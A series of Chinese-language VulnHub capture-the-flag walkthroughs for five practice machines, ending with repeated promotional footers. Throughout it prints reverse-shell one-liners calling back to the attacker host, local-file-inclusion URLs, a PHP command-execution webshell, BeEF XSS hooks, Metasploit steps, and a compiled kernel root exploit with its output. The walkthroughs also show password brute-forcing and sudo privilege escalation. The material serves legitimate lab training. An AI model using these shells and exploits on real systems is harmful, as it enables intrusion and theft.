Nightmare (v1.0.2)-vulnhub靶机渗透 靶机下载地址：https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/这是一个类似于ctf的机器，靠脑洞随便输入一个数字就行点击上面的start the ctf，就来到了这个界面，经过dirb，dirsearch的扫描之后没有其他有用的界面，就一个图片，那么漏洞点就很容易猜啦就是文件包含漏洞了，这样子看不好看我们使用curl命令就好了curl http://10.10.10.132/?page=/etc/passwd我包含了各种文件，直到包含到了这个knockd.conf然后80端口就关闭了。。。。之后这个80端口就关闭了，新开放了一个60080端口尝试访问一下看看看看图片有没有隐写信息，也是没有再来猜测一下，和首页一样，有一个page参数，也是猜测成功了！我们使用dirb进行文件包含的爆破直到mailer，又是一个新的界面了，并且下面还有一个提示信息我们抓包，尝试执行whoami！成功发现漏洞点！查看python的版本，包含了3，但是没有2那么就使用python3进行反弹shell吧export RHOST="10.10.10.128";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'我是用uname -a的时候看到了系统信息比较老，可以使用藏牛提权！我们直接去github上下载藏牛的exp就好啦！至此提权成功啦往期推荐全网低价证书找我 + baibaixiaoyu2024包括且不限于cisp，cisp-pte，pts，cissp，cisp-ire，cisa，OSCP，osep等等往期推荐新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 Linux 信息收集，提权一键梭哈神器x-WAF，一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

Photographer 1-vulnhub靶机渗透 官网链接：https://download.vulnhub.com/photographer/Photographer.ova这是80端口第一时间查看源码，这是作者的信息，可能有用随后对这个靶机进行全端口扫描使用无密码连接并显示smb服务器的文件列表（需要smb服务器支持无密码连接），有一个sambashare共享文件夹无密码登录进去看看，登录成功了是agi发给daisa的一封邮件，告诉daisa网站已经搭建好了，不要忘记你的密码：babygirl我们使用dirsearch扫描的时候，扫描到一个后台地址/admin，输入它的邮箱和密码，就可以登录啦这是登录成功的界面那么漏洞呢？我们使用whatweb cms指纹识别工具，识别到了这个cms系统为koken 并且版本为 0.22.24 ，然后使用searchsploit漏洞检索出这个漏洞利用信息查看是怎么利用的嘞，大概就是讲需要登录到后台，然后上传一个 shell.php.jpg 一个图片格式的php马，然后利用burp修改后缀为shell.php这样就可以getshell了那么我们根据他的提示来，找到这个import content抓包之后修改我们反弹shell的php文件后缀在前端找到这个shell.phpkali要进行监听，点击后就可以反弹shell了，这个时候还需要创建一个交互式的终端python3 -c 'import pty;pty.spawn("/bin/bash")'我使用featherscan看到计划任务中包含了php这个东西，可能会有点用随后featherscan又看到了suid文件php7.2这个东西那么我们就可以直接进行提权了，什么？提权原理？suid提权谁还不会啊？来看看这篇find提权文章给你详解，利用的就是suid权限：Linux中Find命令也能提权？提权方式一文通透全网低价证书找我 + baibaixiaoyu2024包括且不限于cisp，cisp-pte，pts，cissp，cisp-ire，cisa，OSCP，osep等等往期推荐新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 Linux 信息收集，提权一键梭哈神器x-WAF，一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

Stapler-vulnhub靶机渗透 靶机地址：https://www.vulnhub.com/entry/stapler-1,150/靶机描述：Stapler is reported to be one of several vulnerable systems that are supposed to assist penetration testers with challenges similar to Offensive Security’s PWK coursework.这个靶机打开的时候呢需要选择“我已移动此虚拟机”否则可能打不开，或者导致网络错误我们在端口扫描的时候，就能看到ftp是允许匿名登录的除了80端口还有12380端口都是http服务我们对第一个http服务，也就是80端口进行目录扫描curl http://10.10.10.220/.profile curl http://10.10.10.220/.bashrc 使用上面的命令可以看到这些内容（没有什么东西）接下来我们使用ftp匿名登录有一个note笔记，把它get下来查看┌──(root㉿kali)-[~] └─# ftp 10.10.10.220 Connected to 10.10.10.220. 220- 220-|-----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|-----------------------------------------------------------------------------------------| 220- 220 Name (10.10.10.220:kali): ftp 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 550 Permission denied. 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 107 Jun 03 2016 note 226 Directory send OK. ftp> cd note 550 Failed to change directory. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 107 Jun 03 2016 note 226 Directory send OK. ftp> get note local: note remote: note 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note (107 bytes). 100% |*********************| 107 1.03 MiB/s 00:00 ETA 226 Transfer complete. 107 bytes received in 00:00 (110.69 KiB/s) ftp> exit 221 Goodbye. ┌──(root㉿kali)-[~] └─# cat note # 查看note Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.翻译结果如下没有找到有用的信息，我们来到12380端口的web，他报了一个400，使用目录扫描的时候也不正常我们增加一个https试试随后进行目录扫描dirsearch -u https://10.10.10.220:12380/包含了一个robots.txt还有phpmyadmin，但是我们不知道账号密码在phpmyadmin登录这里有一个“帮助”按钮点进去就有了phpmyadmin的版本信息这样子找找phpmyadmin的nday（利用过几个之后也没什么作用）我们打开目录扫描出来的robobts.txt，包含了两个目录，一个是后台界面的目录，一个是博客地址访问后台，缺弹出了一个框，看这个样子应该是被别人黑过，留下了一个xssbeef的payload使用whatweb识别cms是属于wordpress站点whatweb https://10.10.10.220:12380/blogblog/利用wordpress渗透工具wpscan，枚举可能存在的用户并使用这些用户名对后台进行爆破，使用kali中的seclists字典wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt爆破成功后应该会显示这四组账号密码wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt --disable-tls-checksgarry:football harry:monkey scott:cookie tim:thumb登录后台第一篇文章第二篇文章，还有第三篇文章，都没有什么用我们访问wordpress插件的目录（dirb，dirsearch都能扫出来）可以看到有三个插件来看第一个插件，他会有一个readme.txt版本是1.0在这里我们搜索这个插件的漏洞，额外找到了突破点我们尝试运行这个exp，报了一些错误，显示的是Connection refused即连接被拒绝我们查看一下他的源码我们修改这个内容sed -i 's|http://127.0.0.1/wordpress|https://10.10.10.220:12380/blogblog|g' 39646.py在这里解释一下sed命令，平时我也不怎么用，-i参数表示的是直接修改这个文件，由于url中包含了很多个/所以就换了个符号|进行分割，不然也可以使用/，s表示替换命令，最后面那个g表示全局替换，使用示例sed -i 's/原内容/新内容/g' # / 写法 sed -i 's|原内容|新内容|g' # | 写法此时我们就已经把想要替换掉的内容直接替换掉了此时又出现了一个问题，ssl错误，我们的靶机站点ssl错误了，不清楚怎么修改代码不要紧，我们使用他提供的poc手工打（这个漏洞脚本中有）下面这个poc是一个文件包含漏洞https://10.10.10.220:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php访问的时候出现了一个url，但是没有出现wp-config.php的文件内容https://10.10.10.220:12380/blogblog/?p=1180访问这个地址，显示了一个页面不存在的样子随后我找了半天，尝试了各种操作，在uploads中找到了不知不觉新增了几张图片https://10.10.10.220:12380/blogblog/wp-content/uploads/我访问其中一张图片的时候发现了数据库的密码 root : plbkac ，原来访问了那个文件包含的poc，在这里会生成几张图片，二这个图片的内容就是你包含的文件的内容！curl -k https://10.10.10.220:12380/blogblog/wp-content/uploads/2145541298.jpeg我们登录数据库，目标id为1的john解密 incorrecthttps://www.somd5.com/使用数据库密码和其他用户试试（同样使用文件包含漏洞，获取 /etc/passwd 文件内容），下面是可能的用户┌──(root㉿kali)-[/data/demo] └─# cat user.txt sync peter RNunemaker ETollefson DSwanger AParnell SHayslett MBassin JBare LSolum MFrei SStroud CCeaser JKanode CJoo JLipps jamie Sam Drew jess SHAY Taylor mel kai zoe NATHAN www elly使用这些用户，还有数据库的密码，进行爆破（猜测数据库密码是其中任意一个用户的名字）使用ssh进行登录使用featherscan，进行Linux信息收集git clone https://github.com/baibaixiaoyu2024/FeatherScan.git cd FeatherScan/FeatherScan_v4_5_/ chmod +x FeatherScan_v4_5 ./FeatherScan_v4_5发现了如下漏洞信息，如果仔细辨别名称的话，这个系统版本都不属于这些漏洞范围挑选了最可能存在的一个内核exp。提权失败了当然不能局限于这些内核漏洞，毕竟工具不能代替人工，随后找到了这个exp最后面有一个exp，我们去下载zoe@red:/tmp$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip zoe@red:/tmp$ ls 39772.zip FeatherScan searchsploit_commands_21765.sh vmware-root zoe@red:/tmp$ unzip 39772.zip Archive: 39772.zip creating: 39772/ inflating: 39772/.DS_Store creating: __MACOSX/ creating: __MACOSX/39772/ inflating: __MACOSX/39772/._.DS_Store inflating: 39772/crasher.tar inflating: __MACOSX/39772/._crasher.tar inflating: 39772/exploit.tar inflating: __MACOSX/39772/._exploit.tar zoe@red:/tmp$ ls 39772 39772.zip FeatherScan __MACOSX searchsploit_commands_21765.sh vmware-root zoe@red:/tmp$ cd 39772 zoe@red:/tmp/39772$ ls crasher.tar exploit.tar zoe@red:/tmp/39772$ tar -xvf exploit.tar ebpf_mapfd_doubleput_exploit/ ebpf_mapfd_doubleput_exploit/hello.c ebpf_mapfd_doubleput_exploit/suidhelper.c ebpf_mapfd_doubleput_exploit/compile.sh ebpf_mapfd_doubleput_exploit/doubleput.c zoe@red:/tmp/39772$ ls crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar zoe@red:/tmp/39772$ cd e ebpf_mapfd_doubleput_exploit/ exploit.tar zoe@red:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/ zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls compile.sh doubleput.c hello.c suidhelper.c zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh doubleput.c: In function ‘make_setuid’: doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .insns = (__aligned_u64) insns, ^ doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .license = (__aligned_u64)"" # 这里报错不要紧，不影响脚本正常编译 ^ zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput starting writev woohoo, got pointer reuse writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. whoami suid file detected, launching rootshell... we have root privs now... root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami root至此提权成功！其他思路，在home下面发现了一个sudo用户peter，而且能够使用sudo查看历史命令，发现了另外两个用户的密码，其中包含了peter！能使用sudo！那么思路不就来了sshpass -p thisimypassword ssh JKanode@localhost sshpass -p JZQuyIN5 peter@localhost有了密码，使用sudo的时候发现sudo权限是all，那我们就能直接提权 sudo -i至此两种方法提权成功。感谢阅读至此的你，致敬~全网低价证书找我 + baibaixiaoyu2024包括且不限于cisp，cisp-pte，pts，cissp，cisp-ire，cisa，OSCP，osep等等往期推荐新版BurpSuite v2025.6.3汉化版，附激活教程挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

Devguru-vulnhub靶机渗透，oscp之路 地址：https://www.vulnhub.com/entry/devguru-1,620/发布日期：2020年12月7日 缺陷：中级（取决于经验）目标：获得user.txt与root.txt并获得root权限运行：VMware Workstation 16.x Pro（默认为NAT网络模式，VMware比VirtualBox更好地工作）描述：DevGuru是一家虚构的web开发公司，雇用您进行pentest评估。您的任务是在他们的公司网站上查找漏洞并获取root。OSCP类~基于现实生活常规操作，我们使用arp-scan -l进行内网主机探测，然后用nmap端口扫描工具进行端口扫描，发现80端口开放之后使用dirsearch进行目录扫描访问我们的80端口经过目录扫描之后发现了一个adminer数据库管理工具我们访问8585，同样也是http服务，在尾部查看到了这个系统的版本使用searchsploit检索漏洞，发现一个远程代码执行漏洞这里我们需要用到一个工具GitHack，前面通过dirsearch扫描到了一个.git这个时候我们就能用githack找到源代码https://github.com/go-gitea/gitea/releases?page=12python GitHack.py http://10.10.10.226/.git/查看源码这里能看到3306mysql数据库的账号密码回到刚刚的数据库管理工具adminer登录，发现了账号密码我们是cmd5进行解密，解密失败了既然破解不了，那么我们新增一个用户啊，不过要注意这里分组id需要设置为2我们再去分组表，新增一条数据，将这个用户id和分组id配合上将刚刚的用户id，添加到这里来找到这个后台地址（使用dirb能扫描出来），这样我们就能登录了我们找到这个home下面，修改代码function onStart(){  $this->page["PoisonVar"] = system($_GET['cmd']);}并调用这个函数{{ this.page.PoisonVar }}尝试利用这个代码，访问主界面进行传值，是可以正常执行命令的我们看看有没有python，看到python是3.6.5版本这里我们直接执行这条python的反弹shell命令，并开启监听，反弹shellexport RHOST="10.10.10.130";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'我们使用featherscan内网特权提升工具，进行信息收集，并没有发现可以直接提权的命令，这个工具最新版需要在泷羽Sec的freebuf帮会获取，4.5版本已经放在了githubhttps://github.com/baibaixiaoyu2024/FeatherScan/随后我们在这个文件里面找到了另一个数据库的密码，就是8585端口的那个系统的配置文件里gitea：UfFPTF8C8jjxVF2m登录看看再去解密，解密失败那么还有一个思路是不是，我们可以直接修改它默认的用户密码，不用去新增用户了，我们需要使用 bcrypt 加密算法，对123456进行加密，将hash内容填到密码这随后我们登录这个后台http://10.10.10.226:8585/user/login登录成功了找到这个 settings 之后去修改代码内容在尾部添加一个bash -c "exec bash -i >& /dev/tcp/10.10.10.130/1234 0>&1"之后我们随便编辑一个文件，加一点内容，任何内容都行点击保存按钮监听方就能收到shell的回弹了创建一个交互式终端python3 -c 'import pty;pty.spawn("/bin/bash")'我们使用sudo -l的时候看到了一个sqlite3数据库命令可以使用，提权利用网站查找：https://gtfobins.github.io/那么我们尝试使用sudo+sqlite3进行提权，但是我们没有密码，提权不了呀，后面发现了sudo版本为1.8.21p2再找找sudo的利用漏洞发现可以使用特殊符号进行绕过那么我们就在原先的那个命令添加进行绕过就好了，提权一切顺利，至此靶机结束全网低价证书找我 + baibaixiaoyu2024包括且不限于cisp，cisp-pte，pts，cissp，cisp-ire，cisa，OSCP，osep等等往期推荐新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 Linux 信息收集，提权一键梭哈神器x-WAF，一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透 

Breach2.0-vulnhub靶机渗透，oscp认证之路 下载链接如下：https://www.vulnhub.com/entry/breach-21,159/首先靶机的IP是固定的 192.168.110.151 IP地址，nat网络也要是110段，不然扫描不出来IP地址首先我们使用nmap进行端口扫描，ssh服务换到了65535端口这个时候没有开启80端口，我们尝试连接一下ssh发现了账号密码 peter / inthesource，我们登录一下发现自动断开了连接回头却发现80端口开启了靶机当然要第一时间查看源码撒随后使用目录扫描扫描出来一个blog对搜索框尝试SQL注入xss尝试成功<script>alert(111)</script>接下来打开beef-xss，注意如果遇到了beef-xss下载不了，或者使用不了的话，我们要把他重新下载apt remove rubyapt remove beef-xssapt-get install rubyapt-get install ruby-dev libpcap-devgem install eventmachineapt-get install beef-xss这里会先让你输入密码等待几秒后就会自动打开浏览器，输入账号密码，默认用户为 beef ，密码为你刚刚启动beefxss输入的密码将下面的payload填入这个搜索框<script src="http://127.0.0.1:3000/hook.js"></script><script src="http://192.168.110.128:3000/hook.js"></script>这里需要耐心等待几分钟，靶机就能上线了，发现靶机的火狐浏览器版本是15.0，靶机是设置了自动执行这个xss，实际情况需要利用社会工程学使用漏洞检索工具searchsploit检索这个版本浏览器的漏洞，发现可以使用MSF那么打开MSFMSFconsolesearch firefox 15.0use 0设置好配置项use exploit/multi/browser/firefox_proto_crmfrequestset SRVHOST 192.168.110.128set URIPATH shellshow payloadsset payload 3将生成的结果http://192.168.110.128:8080/shell填到这个里面这样子就能执行命令了，但是呢，就立马断开了，这个shell很不稳定，所以我们需要创建一个稳定的shell，使用MSF的post/multi/manage/shell_to_meterpreter模块use post/multi/manage/shell_to_meterpreterset session 1创建交互式终端python -c "import pty;pty.spawn('/bin/bash')"我们的80端口默认是访问不了的，需要使用ssh连接一下，才开启的80端口cat /etc/sshd_config注意不是ssh_config，他俩还是有一定区别的特征sshd_configssh_config作用对象SSH服务器端（sshd服务）SSH客户端（ssh命令）主要配置位置/etc/ssh/sshd_config/etc/ssh/ssh_config（全局）或~/.ssh/config（用户）生效方式修改后需重启sshd服务每次执行ssh命令时读取配置目标控制服务器如何响应连接控制客户端如何连接服务器关键配置项端口、认证方式、用户访问控制等端口、私钥路径、用户名、主机别名等只有peter才能登录，并且登录成功后会执行/usr/bin/startme那么到这就已经很清楚了，为什么连接了一下ssh它的80端口就开启了我们来看看他的权限，其他用户不能写，只能root用户写，那么这种提权方式就不能使用了只有当以peter身份成功通过SSH登录时，阿帕奇服务才会被启动，80端口也会随之开启。这主要是由于存在ForceCommand设置。在执行完/usr/bin/startme命令后，SSH会话就会结束。由于没有提供一个能够持续运行的交互式Shell，所以SSH连接会立即断开。echo "exec sh" > .bashrc这样子就能使用ssh连接了既然是有密码的，那么我们可以直接sudo，发现能利用的只有apache2继续信息收集，找到web所在的目录/var/www/html，blog里的配置文件密码为空我们登录进去查看表数据，却只得到了我们利用xss登录进来的代码，没有什么用mysql -uroot -p# 不用输入密码 直接回车这里我们切换另一个数据库看看，也就是/var/www/html2下面的这个cms，得到管理员密码，32admin，可能有用，退出来换root（失败）在端口信息收集的时候，看到一个不常见的端口，使用telnet连接的时候却输出了一对经纬度利用谷歌浏览器进行导航，发现一个位置，那么这个位置可不可能是管理员密码呢？答：可能，但是登录失败。。。。。。直到我利用telnet登录这个2323端口，才有了新的突破，他问了一个问题，订书机是谁的？我们需要在目录下寻找关键词staplercd /usrgrep -rno stapler在结果中看到一个/usr/local这个目录下通常包含了本地安装的软件，这里我们看到一个cd.py为什么是/usr下面的文件，而不是其他的地方找？答：其他目录也可以，这里只是忽略掉了找的过程，比如/var下面的所有文件只有一个index.html包含stapler字符，并没有利用价值。此时就可以正常输出 Woot 啦！而且用户也切换成功我们来看看网络的端口，包含了8888端口，而且是tcp协议测试，这不是html嘛访问，目录下面有一个oscommerce点进去看看，又是一个cms看看后台目录在哪前面我们看了这个数据库的密码，admin / 32admin，却也禁止登录了我看了看网上的wp，是需要指定cms的密文解密而我这。。。。。。无奈只能凑合登录登录了，当然也可以爆破我们找到这个目录，普通用户可以读写我们使用weevelywebshell连接工具生成一个免杀马上传上去但是我们打开这个免杀马的时候，里面没有任何内容（可能是文件传输过程中出错了）并且shell也连不上那么就换一种方式，用kali自带的webshell进行反弹，我们修改好这里的ip地址喝端口为kali监听的地址和端口下面找到这个shell.php，访问即可反弹成功反弹成功我们试试sudo -l，发现它不用我们直接输入密码，有一个tcpdump提权我们找到当前的网卡信息依次执行命令就好COMMAND='id'TF=$(mktemp) # 一个临时文件路径echo "$COMMAND" > $TF # 追加要执行的命令到上面那个文件chmod +x $TF # 赋予执行权限sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root# 注意这里 ⬆ 是你需要监听的网卡地址# 即可提权执行命令提权执行命令的时候，使用bash，他反弹不成功，我们可以利用刚刚上传上去的php文件进行反弹执行命令的同时，反弹成功，是root权限，提权成功感谢观看结束的小师傅们全网低价证书找我 + baibaixiaoyu2024包括且不限于cisp，cisp-pte，pts，cissp，cisp-ire，cisa，OSCP，osep等等往期推荐内网渗透，流量转发Linux内网渗透（2w字超详细）AD域内网渗透-三种漏洞利用方式【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透一个永久的渗透知识库